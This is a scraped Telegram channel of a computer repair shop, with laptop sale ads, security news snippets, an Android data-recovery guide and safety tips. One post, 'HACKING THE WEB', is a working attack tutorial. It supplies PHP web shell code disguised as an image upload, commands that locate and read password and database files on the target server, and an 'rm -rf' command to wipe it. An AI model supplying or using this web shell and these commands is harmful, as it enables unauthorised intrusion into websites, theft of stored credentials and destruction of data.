Geeks Tech computers
988 subscribers
433 photos
10 videos
37 files
356 links
Computer repair,laptop sales & accessories available
Download Telegram
(Tumblr patches a critical vulnerability)[https://thehackernews.com/2018/10/tumblr-account-hacking.html] in the "Recommended Blogs" feature on its desktop version of the website that could have allowed hacker to steal users’ account information, including emails and passwords (hashed and salted)
brand new 4gb ram 500gb hdd 2.4ghz processor @25k
sandisk available brand new 256GB ....inbox me @febifebian
Am buying dead & used laptops with everything intact kindly inbox, turn your dead laptops into cash inbox me @febifebian
FireEye: Russian Research Lab Aided the Development of TRITON Industrial Malware

Cybersecurity firm FireEye claims to have discovered evidence that proves the involvement of a Russian-owned research institute in the development of the TRITON malware that caused some industrial systems to unexpectedly shut down last year, including a petrochemical plant in Saudi Arabia.

TRITON, also known as Trisis, is a piece of ICS malware designed to target the Triconex Safety

@Geekstechcomputers
🔴 How to recover deleted image or video from android (internal
storage) without root

▪️STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.

👉You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.

▪️STEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:

👉“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.

▪️STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.

👉First, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.

▪️STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT

👉After identification, click "Start" for scanning.

Please be patient about the process.

▪️STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.

👉You will be able to review all the details of desired
data.

▪️STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.

👉Mark those data that you want, then tap “Recover”to fulfill android data recovery without root.
HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
👌Done happy hacking.
Simple steps to avoid being a Cybercrime Victim

1.Avoid using public networks.Refrain from connecting to free Wi-Fi networks from coffee shops or other public places. Connecting your device to public networks exposes it potential hackers that can easily get through the low level security of these kinds of networks.

2.Avoid using public computers for sensitive business. If you’re about to do some personal transactions like banking or online shopping, do not do it using public computers. Other people who have used the computers before you may have put programs that can record the passwords you type in.

3.Do not give out your passwords.Keep the passwords of your various accounts to yourself. If you do let someone know, make sure to change it afterwards to prevent that person from accessing your private internet accounts without permission.

4.Avoid downloading unknown applications. The Internet is full of free software from unknown sources. These kinds of programs normally carry malicious applications with it and installing it may infect and cause serious damage to your computer.